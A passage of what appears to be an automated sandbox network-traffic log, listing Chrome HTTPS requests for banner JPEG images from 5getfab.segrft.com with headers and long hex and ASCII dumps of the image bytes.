                                                      Data Ascii: OghXF$`k)C;DO%rDi+aO\PI#UsY 36x%|di!HEogXiC#pzIBj#3yF'F*,ae3rJj-Syo"~_RA ?_>=o?<2/eo5`B) ^R9R(Yau&
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 55 9c a8 ae 12 4d 12 1d 65 54 53 64 60 92 c2 9b de f7 0e d5 3a cf c9 b1 4c 8a db 12 4f ce c2 ca d6 66 a6 73 cd ce 83 52 88 bc 8a f6 82 48 b6 d0 25 4e 23 a5 47 a3 96 31 72 04 7f fd ec 04 a5 8d 1f f8 34 a1 c2 78 4e 0c 11 48 eb 11 2a a9 cc 36 c7 f5 44 3f cb 87 6e 09 57 0a ef 95 a5 51 14 12 78 b2 5b a7 8b ef a9 91 ef 29 e4 92 86 19 25 72 56 19 5a b1 11 d5 11 1f ad 07 b7 d8 72 f5 16 e8 f3 8c c0 62 ec c9 1a 4b 5b 23 b2 9d 23 51 75 bb 38 b1 64 82 5c 1d 02 78 25 f5 63 14 fa fd 83 56 3d d1 12 37 53 25 93 c8 41 2b 48 e9 4d 3e 99 66 28 35 3b 97 93 b6 e9 1f 33 14 2a f6 60 a7 4a 82 3c d0 3c 31 f6 47 b9 fb 8e 57 da 74 d4 63 49 3e b7 c4 42 24 f8 4a ca a5 4e d5 13 14 28 4b 0c 04 54 a7 12 90 12 a4 46 aa 02 0d 5f 8d 84 e9 a1 fa aa 81 42 2e 4c 7d 53 3e c3 97 34 01 9e a8 08
                                                      Data Ascii: UMeTSd`:LOfsRH%N#G1r4xNH*6D?nWQx[)%rVZrbK[##Qu8d\x%cV=7S%A+HM>f(5;3*`J<<1GWtcI>B$JN(KTF_B.L}S>4
                                                      2025-01-12 23:47:56 UTC4096INData Raw: d9 c7 85 bb ca a4 ba a0 fc 4e 9e 49 62 0c 3c 4c 85 c8 37 bb 29 35 f8 46 92 3a 93 4c 08 0a 1d b8 05 0d 85 f0 4d 57 58 64 3b a5 5d 84 31 b6 ac 8e 61 30 67 5f 25 41 15 ed b0 c7 90 51 28 6e 68 34 5a 49 78 8d 99 82 45 9a 9a 70 6d aa 1c b8 35 68 9e 3b 66 f4 d0 ac 73 0a 67 82 99 d3 d2 80 b4 0c a5 a7 28 6b 36 65 8a 3b 58 6e 15 2c bc 98 67 2d d0 98 cd e5 77 69 56 22 9a 56 0f 16 24 d5 35 57 4b 2f 9b 8d 27 21 a6 8d 18 81 ab 55 3c a8 73 3b 62 01 d0 6c ec be b4 62 7f a9 56 c7 a5 80 f3 a5 1e 9b b0 1b 8e cc 7a a7 01 e5 26 04 5d 63 8f cf 25 2d 57 eb 27 6c 6d e2 dd e4 03 e8 c4 23 6e 8d 31 23 f6 57 83 fc 8e 78 a8 7d 20 a9 07 e4 e6 c8 2b d6 40 20 33 51 a2 35 eb 62 c3 65 0d 6f 7c 3b c5 5d 75 48 70 ea 50 84 40 72 88 d2 22 23 0a ab 5f fd 41 78 3e f9 ff c4 00 35 11 00 01 03 03
                                                      Data Ascii: NIb<L7)5F:LMWXd;]1a0g_%AQ(nh4ZIxEpm5h;fsg(k6e;Xn,g-wiV"V$5WK/'!U<s;blbVz&]c%-W'lm#n1#Wx} +@ 3Q5beo|;]uHpP@r"#_Ax>5
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 35 b5 05 c0 0a 3b 8e 7e d0 03 93 fa bd 5a ff 00 ca 36 ac 70 8e fd eb 8a c8 87 41 83 16 5c af 03 1f a9 b9 cd 52 9b 43 3c 25 28 2e d8 60 46 bd da 19 33 01 3a d1 84 de 12 b0 6c a4 81 bb 78 70 20 06 7b d4 22 87 29 c6 1b 3f 68 ad 3f 50 a1 8c ff 00 6b a3 f5 23 63 13 f9 75 fa 93 b4 8d b2 d1 ef 14 6f bb 93 6a 12 d4 e1 14 e4 bc c8 e6 ae 58 68 a0 43 83 17 88 d3 3f e9 27 5d ff 00 b9 81 d8 01 32 ca eb 78 f0 1e 6a 2a 85 a1 fe 4f 64 40 3e f7 da e8 40 95 a8 7b b4 74 c8 cb 5c 6b 23 2e 8e ba 59 d7 4e 78 b9 57 ab 58 de ac 06 40 21 82 87 ac 0f 40 a4 6d 90 9b 75 59 f7 13 78 3d 35 66 60 4e c3 3c a6 5a 34 91 64 cd ed 5d 8a 3d e3 96 84 2d 5b 66 a9 9f 94 c1 79 ac 2f 98 61 a9 ab 53 7c a4 65 b4 46 3d a8 a8 1b e2 54 06 7b 85 31 77 f8 54 88 3f 2a 9b be 19 c0 9b 74 1c 57 85 32 69 7f
                                                      Data Ascii: 5;~Z6pA\RC<%(.`F3:lxp {")?h?Pk#cuojXhC?']2xj*Od@>@{t\k#.YNxWX@!@muYx=5f`N<Z4d]=-[fy/aS|eF=T{1wT?*tW2i


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      97192.168.2.44984620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC616OUTGET /images_plus/other/banner6.jpg?ver=1606891697 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 54542
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:17 GMT
                                                      ETag: "5fc738b1-d50e"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:56 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 07 02 04 05 08 09 0a 01 ff c4 00 1c 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 02 05 06 07 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f3 fe
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 4a 4a 59 fc b5 ba 99 a5 f6 20 a8 a8 00 0a 85 0a 81 1a 87 ab da 3b 2b c8 36 3a 07 1c 9c 86 db 69 1a d9 d7 7d 19 52 fe 19 9f 3c af 5d 1e f5 9c 74 a9 26 8c cf 8f 61 e1 da 61 db 5a 05 89 6b 49 b2 73 72 bb 8d 3b ef f9 99 d2 d7 2b 93 f9 ad 86 f0 ee 19 b5 a7 98 f4 7b 4e 92 d9 b1 d6 e9 e0 76 cb 5c 32 5f 30 e2 bf 39 77 98 91 e5 8e 9e 3d 87 e8 75 bd 7b e4 b6 dc 63 b5 16 92 75 fa 8b 79 23 0a 4a 4a 0f 80 26 00 00 00 02 a2 88 ee 24 86 e5 1d cb 1b c9 2b 64 33 82 69 b7 c5 c5 74 fa 97 9d 8d 1f cc be e3 e3 9f 3d 3e b5 ab 06 e1 e9 3e 96 22 a9 d8 59 c7 3d b3 3b 68 ec 59 b3 b6 8e 74 59 89 00 01 40 00 2a 2a 3e 8b 23 0a d1 bb cf 63 94 37 d8 4c 32 79 c9 0f 3f df 3c ca 5e d7 4e 26 6f 5f b5 d9 fe 0f d5 1f 92 57 d7 2e ab 80 8c 77 dc d2 2c e8 16 01 da 34 c4 06 a8 f1 13 31 a7 50 fc
                                                      Data Ascii: JJY ;+6:i}R<]t&aaZkIsr;+{Nv\2_09w=u{cuy#JJ&$+d3it=>>"Y=;hYtY@**>#c7L2y?<^N&o_W.w,41P
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 92 ed 68 f9 02 d7 50 4d 08 27 db 91 ce 55 a4 c9 4b 70 dd 17 20 b1 ae 9a 3c 75 fc ae 5d 4e 26 3c b1 43 94 4d 24 eb 8e a8 b0 f9 e6 b9 58 aa d1 84 58 14 fd aa 9a 67 cc 81 43 ad b7 f1 75 88 c9 21 7d 76 7b 4e 47 6c 27 08 71 44 64 37 29 58 09 95 14 c8 33 7a 99 17 cd cd b5 db 33 14 76 6a d6 94 25 31 23 b7 95 a0 aa 1b 29 72 45 51 9a 71 72 03 ec e4 ba 87 21 c7 aa e7 9c 36 89 6d 8c d4 a2 9a 9e cc 0e 47 7d bc 5c ba 0a fb a4 ca 92 0e 86 19 96 49 98 e4 65 33 6b 25 93 4a a2 bc cd 32 8c 2f a6 5c 66 4c d7 ca 2e b9 f9 a5 46 b0 1b 36 34 5e 89 58 4d b7 cb a7 31 46 59 1c 61 bd 5f 5b 42 aa 80 41 6d 04 6f 3c a8 1c d9 83 5f 18 6e 3c 42 eb 4d 5b 59 8d d3 6e 39 69 1c b2 bb ed d9 20 3e 5f 0f 03 52 0b d5 e0 a2 aa bf a2 67 4a 01 ff 00 6e 2b 49 36 d7 a8 82 f0 ae 38 e2 e5 ad c7 4e 4d
                                                      Data Ascii: hPM'UKp <u]N&<CM$XXgCu!}v{NGl'qDd7)X3z3vj%1#)rEQqr!6mG}\Ie3k%J2/\fL.F64^XM1FYa_[BAmo<_n<BM[Yn9i >_RgJn+I68NM
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 78 b1 93 f5 aa 69 a0 f5 3c 2e 34 b2 67 d6 33 b9 d4 f5 e0 f0 22 ea 3f 24 46 93 6b 84 a0 fb 4b cd 26 9c 5d 6c 97 42 71 0a e4 9b 8d 71 43 37 af 1c 86 fb 78 bf 06 64 0c 8c 70 9a 58 52 43 96 34 79 8e 6b cd a2 ad 30 e7 c5 89 1a 68 66 10 36 37 1e 2f fe d7 5e f7 3b 70 2d 96 eb 51 1b 8c 09 1a 42 83 f4 c3 82 a9 89 a3 23 65 8e 3c ac 81 d0 6d c5 64 32 5b 8c d1 c1 06 33 67 1a 9a 25 23 ac 03 07 5c 0a c0 66 d1 35 be d2 8d 9a d8 6a 9d 9f a2 74 5a 29 6d 4b 8d 10 da 6e a3 29 c1 67 dc db c6 df 5b 3a f2 9c 8a 08 29 0c ab 8d 0d 59 fe de 3e f7 ec 30 38 84 41 e0 a7 c6 20 9b 98 6d 2e aa b5 57 89 39 d0 cd 6c 9c 9b 52 10 06 5a 29 24 33 c0 2c 12 46 9d 57 04 a9 9a 71 74 c0 55 eb 2c bb 77 7a d0 bb 64 a8 a9 42 24 5f 6b b7 1a e4 ad e3 4e fb cf bd 22 d4 2f bc 13 8f 44 51 d8 17 15 a6 be
                                                      Data Ascii: xi<.4g3"?$FkK&]lBqqC7xdpXRC4yk0hf67/^;p-QB#e<md2[3g%#\f5jtZ)mKn)g[:)Y>08A m.W9lRZ)$3,FWqtU,wzdB$_kN"/DQ
                                                      2025-01-12 23:47:56 UTC4096INData Raw: a9 3e 9a 15 be 33 7d b5 d1 13 50 6d 72 56 72 4b c6 20 c2 54 26 50 bc 89 0d bc 57 e2 d7 04 ba 50 20 e8 47 29 6b 0f 95 14 00 15 13 dd 8d b1 8e f5 ed 7e 1e f0 41 f5 70 79 78 d2 3f 49 b9 13 53 d9 6d 40 af ca 3c 9a d1 dd c1 47 76 8f a5 8c 6e 44 85 8c db aa 4e 6f 0b a0 b8 19 ee f4 5c e3 d7 71 ce 90 d6 dc f1 0c 8c a3 1a 3a a8 54 0c 51 72 2b a1 3c ff 00 0c 47 5a 93 b4 dd 93 74 88 92 da 00 fb 3e 58 b1 cd 3e ae 53 f9 d0 ee 25 15 ca d4 ac e1 81 4b e6 09 a1 85 e1 2c 96 70 df 9b f0 68 22 4c b9 0f 85 9f 8f 0e 7d 38 e4 06 44 75 5c 82 f2 7b 85 c2 83 71 8c ab 05 2c fc 89 62 e1 8b 38 56 9d ea 0f 99 8d d0 5d cf 32 0e a5 41 75 37 23 3e 3e 47 f6 0b 35 3b 79 66 95 c5 82 ae 0c dd 09 4a 46 53 4f e9 3b d2 67 01 b4 94 99 6e ba 8c 9d 1c c5 1a 8d d8 05 99 ea a1 02 94 91 eb 5a 4b 51
                                                      Data Ascii: >3}PmrVrK T&PWP G)k~Apyx?ISm@<GvnDNo\q:TQr+<GZt>X>S%K,ph"L}8Du\{q,b8V]2Au7#>>G5;yfJFSO;gnZKQ
                                                      2025-01-12 23:47:56 UTC4096INData Raw: df 63 be a3 b7 42 d3 1d e3 a8 25 cd ca 0f 79 89 dd 15 de 4d b9 b4 4a 49 79 07 b5 d7 c3 8e 1c 6d 7e 1e ba bf 52 df 13 f7 b1 bb 5e 37 6b ea 0f ed fa a0 83 e2 ed fd dc 07 46 de 02 0f b8 10 5e fc 51 80 83 f7 fe c6 02 0f 01 07 d7 b5 f8 71 c1 96 34 5e 4e 4a 68 e8 d7 04 35 d2 c0 d9 00 e2 1a 79 a0 eb 04 50 78 e8 57 b6 b8 3d f8 25 7f 29 1a 05 b8 a7 3d 32 e1 37 b9 3d a2 0d b2 3c 17 dd a1 bb d1 05 0b 39 06 35 47 08 e5 77 0d 15 af 43 72 39 94 53 e9 75 91 ca 35 a5 9c ef 51 a5 25 d0 39 84 ea ac fb 48 97 a4 f8 89 43 c6 d0 6f d9 8a 69 72 77 57 bf 78 81 8c e1 b4 b9 cd 92 e4 05 0e 1d 2e a0 55 38 ef 34 4f 6c 25 c7 61 b2 a6 33 28 40 10 b0 49 fe a2 17 96 7c 98 63 51 6c b7 d9 11 c5 51 3b 1d d2 8c ca 22 71 eb 35 cb d7 19 77 2d c4 82 0f 14 74 44 a6 e9 67 c3 6e 2a 30 69 2d 08 70
                                                      Data Ascii: cB%yMJIym~R^7kF^Qq4^NJh5yPxW=%)=27=<95GwCr9Su5Q%9HCoirwWx.U84Ol%a3(@I|cQlQ;"q5w-tDgn*0i-p
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 6f 5e 38 57 82 aa 1c 4b 2f be 5f e3 aa 20 f6 b1 4b b4 73 f1 33 bb 6e 38 3d 74 10 3a ac be 13 7c d3 7b 6a 54 e1 95 6e 9c 72 cc 82 c2 2b 70 73 41 4e a3 47 e0 8a 85 38 90 82 5b 88 a4 eb 48 d8 76 90 80 d9 cd e2 fa 98 5e 7f 85 7d 45 01 52 7a 6d bd 68 cd 83 a8 63 db d9 97 6e 43 8a 2a e4 50 26 57 28 8a 8c 54 e9 74 d0 f0 d3 39 2c 59 e7 e2 b5 63 d3 78 1f cb 5f 87 b2 e7 3a 46 f3 61 97 35 d7 63 ac f1 c7 1d de 45 0a 0c 8a b2 06 b3 5d 8e c2 b5 65 16 2f a4 80 4c ac b4 dc 21 78 36 f5 6b 62 a7 09 c3 3e 9d 3a 88 b1 f8 49 44 3b a3 32 a8 91 39 68 12 b4 05 8a 1f 8b fa 98 a7 fc ac 29 96 10 b0 33 e5 6a 9a 3d a0 f5 e7 fb c6 05 d9 f8 14 fc bb 76 8a d3 96 7f 8a e6 67 e8 cb 0b 0b 4a 36 97 c5 90 59 fe 3d a5 e9 3e 60 e6 fb 38 28 dd e3 b8 03 94 ad 41 16 ee b4 58 5e 2d 9a 97 1f a8 bd
                                                      Data Ascii: o^8WK/_ Ks3n8=t:|{jTnr+psANG8[Hv^}ERzmhcnC*P&W(Tt9,Ycx_:Fa5cE]e/L!x6kb>:ID;29h)3j=vgJ6Y=>`8(AX^-
                                                      2025-01-12 23:47:56 UTC4096INData Raw: db 1b 12 9d 1d 5a 14 b4 10 ef b5 86 3a d3 06 e1 d9 a8 bc 57 ab 52 aa 03 09 6f 23 04 64 d6 9b 32 58 93 08 8c ad ba dd c5 99 7e 01 d9 e5 96 9c 55 f8 6b ed 3b 72 26 30 bb 01 63 db 9f e3 2c f1 df 5d 17 38 74 1a f8 4d 30 25 15 a4 45 67 a0 46 ed a3 e6 fb d5 72 31 78 e2 5a d2 a4 4a e3 ce 1c d2 54 a8 67 b4 7c 48 a2 20 0d 0f 35 a5 7f d7 e4 c3 68 37 87 13 f0 ac fe e3 51 82 19 fc 9b 66 47 2e c2 1b 7f 3e bc 36 ac da 7d 33 89 10 9f 09 ef 58 01 92 bd 1d 42 2c 5d df ce 7e 03 50 71 1e ad a1 0e 23 38 ae 34 32 38 fa 0a 2b b4 dd b8 b7 11 ee c2 a3 c7 14 56 be 1b 40 81 80 32 e5 fc 60 b6 7a 4b 12 eb ed 0a 90 a3 88 23 4f b0 45 59 e9 fc 8f 27 31 e2 5e 54 95 6c f5 a6 18 e1 14 d9 0d 2f 6d a0 3f fe 9e 3b ed 23 fe ea 95 89 35 20 54 fa 93 21 eb f7 45 11 da 4d d3 bb 2b ad e7 b3 0e 84
                                                      Data Ascii: Z:WRo#d2X~Uk;r&0c,]8tM0%EgFr1xZJTg|H 5h7QfG.>6}3XB,]~Pq#8428+V@2`zK#OEY'1^Tl/m?;#5 T!EM+
                                                      2025-01-12 23:47:56 UTC4096INData Raw: bb 6f 64 23 3d df 58 49 77 e2 9b c7 33 a9 30 c5 f6 17 c4 a6 40 5c a6 2a e1 1d d6 48 49 96 5f ce e0 f6 88 06 3f 85 e9 21 fc 0e ae 10 d0 34 b9 6d b4 d6 42 77 5e 36 e3 4b 4b 5a 7c b2 22 01 f2 8f 97 d9 c6 ad f8 0f 7b 56 ff 00 bf a8 c2 38 b3 c2 1c b2 0d 74 16 e2 53 2d e6 1d bc 98 d4 c0 7d f8 7d e1 7e 0a 74 2a ec 2a 77 94 e5 36 93 28 56 b2 fa dc a3 eb e0 30 0b f9 b6 e2 7e f4 cc d1 13 28 2f 1d cb 68 ff 00 21 73 7a 98 a4 4c 28 f3 63 67 d0 c1 f7 bf e0 71 d6 18 43 00 91 32 1b 8d 4d 5b 79 ae 12 5f 65 a5 83 5f 8b 9c b6 ea 09 af aa e2 61 79 7a 8b 0e 69 c8 70 68 dc f9 04 57 fc d9 76 10 5d e6 60 fb 07 80 56 93 a6 32 d6 ca 78 09 dd 69 33 da e4 e4 c7 13 c9 d2 a0 d6 26 5a 0a 9e 7a 5a cb f0 f5 2f 1b d6 3a ab 26 08 6a 86 f5 5e 3e f4 6d 9e 27 94 b9 6d c6 ff 00 1b a1 76 f3 7d
                                                      Data Ascii: od#=XIw30@\*HI_?!4mBw^6KKZ|"{V8tS-}}~t**w6(V0~(/h!szL(cgqC2M[y_e_ayziphWv]`V2xi3&ZzZ/:&j^>m'mv}
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 4a f0 48 c8 6e 1d 80 d8 ee b0 2f c3 b8 70 22 71 df 1e 71 3c b5 45 a5 c4 94 f6 c8 61 3e 44 86 58 80 18 eb 5c 22 d7 d8 16 53 58 61 78 f8 d8 93 c6 d5 0a 27 13 c8 db 09 0f 94 a5 a9 c9 6d 2d 32 0b 29 35 28 85 15 89 98 c9 82 0a 00 0a 9c 30 35 07 39 ba 31 81 e9 b6 d3 b4 c2 d6 09 5b e6 12 b4 b0 1d 0b c7 9d 89 f1 4f d9 2e 4f 6b ec 60 f9 fc 62 22 65 be 62 2d d8 f2 2f 9f 1c 43 1b bc 50 64 ae a0 87 aa a6 8d 25 30 65 25 89 23 16 a0 85 c1 a6 d1 d8 7d 1e f8 36 fe ed d3 ef 72 18 2f a3 eb 79 31 ce 69 e6 57 fb d6 e3 85 75 d9 32 49 a6 f9 e7 4e a6 c1 0a 84 80 8e cf 9a f1 08 2e e4 bf 93 15 ea 93 66 cf 98 ff 00 95 7b 5a 57 11 16 29 ac d5 8d 26 3b 4c 7d 9f aa 5d 58 aa c1 4c 8d 19 0e 12 35 99 73 07 37 4f de 71 04 26 c2 e2 0a 15 4d 3a a8 97 1c f6 90 17 ec e3 8b 2a 3a 14 07 1b 49
                                                      Data Ascii: JHn/p"qq<Ea>DX\"SXax'm-2)5(0591[O.Ok`b"eb-/CPd%0e%#}6r/y1iWu2IN.f{ZW)&;L}]XL5s7Oq&M:*:I


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      98192.168.2.44984320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC616OUTGET /images_plus/other/banner5.jpg?ver=1606891700 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 56687
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:20 GMT
                                                      ETag: "5fc738b4-dd6f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:56 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 08 02 03 07 09 04 05 06 01 0a ff c4 00 1d 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 02 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fc
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 9b 67 87 ba cd d5 5f 69 34 63 fa 43 bd fd 8d c7 2f fd 3e 7e 3e 72 27 5f 71 a8 e2 dc a9 ff 00 2a 3f a3 1b 8b f5 83 f9 63 a9 22 ae f4 bd c2 0d d7 4b 77 02 9f 6b 5c 7d e7 56 7d 65 72 d8 27 31 fc d3 17 7d c1 bf ff 00 c7 8f 7f 9f df d8 dd 7d d0 fd d0 51 e6 a3 38 eb fe f5 5e f2 34 76 41 8c 36 47 37 ea cf 38 d4 b1 07 2a cc 2d 80 0a 4a 41 51 50 00 e4 23 e4 49 04 85 ba eb 3d 9c 5c b5 d6 15 ad c4 64 ec 75 50 ca 3a ec be fb e2 24 a0 9f 95 78 ec 5c a7 bc 45 d8 6e f3 ca bb 10 c0 92 53 e7 9f 92 57 2e 39 ed 68 36 3e b3 a9 ee d2 09 4d e3 a4 8e 54 a5 ce 5e 3c 70 3e 56 e9 fa dd 9a 43 3b 3e e5 e1 f8 aa e3 47 ee da 40 00 fa 56 0a cf d4 a7 25 75 36 85 ba 13 99 fc 45 f3 0c ef eb b3 3f 2b 5d 43 27 30 bb 07 ae c6 b0 1f 63 47 d1 bf a0 2f c8 3c bb 50 3f af b7 5d bb fe 4a db 75 8d
                                                      Data Ascii: g_i4cC/>~>r'_q*?c"Kwk\}V}er'1}}Q8^4vA6G78*-JAQP#I=\duP:$x\EnSW.9h6>MT^<p>VC;>G@V%u6E?+]C'0cG/<P?]Ju
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 50 9a f1 23 6d bc 8c 11 38 dd ae cb 48 99 1d 1e 4b 32 b6 4e c4 30 e6 07 39 70 ab c3 6d db f2 85 9d 10 72 96 13 6f 13 e9 70 3b 71 92 56 40 ac 56 b5 ce 7b 30 a5 0e 56 e0 f4 23 4b fc 57 b9 12 83 28 f7 46 e5 8a 37 21 9c 5b 48 af fc 72 fc 1a 50 80 ee c5 54 92 15 94 e4 1e 4f 6b bb 90 cc 9f 62 38 b0 71 e6 56 2b bc dc 7e 4f 88 47 e2 b3 f3 28 6c c1 1b b3 dd 67 88 d9 e5 36 87 60 36 52 02 82 92 3c 39 61 84 39 0d ce 51 f2 6b b5 1c cf 87 76 b4 af af af b8 91 a7 c7 62 62 25 b9 82 46 ad 73 f3 86 1e 08 e8 86 4a fc c4 52 1e d6 59 2c 99 b8 9d 1b 46 b2 7c 31 00 b4 1c 48 2b 04 fd 59 d0 7a d5 1b d9 eb 60 70 f1 11 94 9c cd 05 d2 68 4d c4 7c ca 86 11 70 42 93 80 49 74 00 65 3c b0 41 2a 90 b7 f0 79 c8 36 4d 1b c8 13 13 d8 93 cb 70 16 d4 a2 a8 49 3c 2e 90 3f 28 86 e7 54 41 df 7f
                                                      Data Ascii: P#m8HK2N09pmrop;qV@V{0V#KW(F7![HrPTOkb8qV+~OG(lg6`6R<9a9Qkvbb%FsJRY,F|1H+Yz`phM|pBIte<A*y6MpI<.?(TA
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 2f d2 2e aa 95 8c 54 85 96 c2 54 20 74 52 c3 d8 de 52 25 79 e5 7f 17 33 f9 e8 75 5d 4b 8a fe 4c 63 ba ea b8 65 d1 25 47 29 ce 60 b9 02 e7 22 46 9c 93 07 6c 15 52 09 1d 02 03 e4 29 e6 d2 91 8a 39 88 b8 8c 91 33 69 79 a1 6b 58 5a d8 8e d7 76 47 c9 3f 2a a4 2e 46 df 3e c7 cd 9a 41 78 ee e9 d4 2a f8 a5 b3 e5 74 67 9c 84 40 05 62 16 8b 9b 78 54 d5 72 70 c3 50 3c 2a 49 ac 5e 5c 9e 17 0d 48 82 2d 25 9c 13 a1 b5 c8 74 88 83 19 1e 61 86 bc 78 12 12 bb d1 46 40 5c 1d 40 cf bf ac d3 ff 00 ca d6 64 f5 99 31 3f ba d6 78 64 1f bb f3 33 ed fd 3d 9f 99 9f cd 0f f5 d5 2d 6f 86 65 9a 53 63 20 fd 54 f4 eb 01 08 81 a3 38 8b dc d4 7c ec 3e 16 7b f7 4e 74 0a 9d 22 7c a2 72 6e ed 41 26 59 08 e5 56 b7 0b 0c de fa 20 4a 42 27 90 bc 2b 0a 06 9e e2 37 08 2c 79 c6 fc 4c d7 44 78 cc
                                                      Data Ascii: /.TT tRR%y3u]KLce%G)`"FlR)93iykXZvG?*.F>Ax*tg@bxTrpP<*I^\H-%taxF@\@d1?xd3=-oeSc T8|>{Nt"|rnA&YV JB'+7,yLDx
                                                      2025-01-12 23:47:56 UTC4096INData Raw: d8 11 03 a1 67 e1 d7 85 51 23 bb 9d 85 58 d7 22 a7 03 6d d1 69 5d 5f 5e 1a 44 8d 95 f9 51 42 3f d1 f4 06 9f 80 25 7b bb eb c4 93 91 a5 ee 52 11 9b 24 06 e8 de 1e 82 69 83 3a 09 38 a4 a9 25 22 e2 ef 91 a3 f2 f9 32 07 91 48 0c 11 c0 e3 50 0f 96 2b 92 b1 96 cf 9b 29 c6 bc 75 08 a3 53 e4 85 98 bd 2c 4e ed 9b 27 15 9f 93 49 af 49 6e b2 c8 e5 f9 5d 4d 8f 4f 48 e0 3b 5a eb 04 4e 2c f6 bf 6f cd ed fa 43 fd 7e 71 51 3e 0d 53 fb 08 24 40 e5 2e a9 81 d1 4b 0c ea f1 15 58 d5 86 60 28 65 a4 82 c4 73 66 f2 44 a7 22 be 33 52 78 ba 8c 28 9a e4 97 96 28 d2 7f 69 35 cd 31 11 ce a5 0b 15 f2 3e eb 67 3b 82 58 47 72 18 20 66 db 72 f1 27 d9 48 d1 21 9e fc 74 e0 70 2a 2f 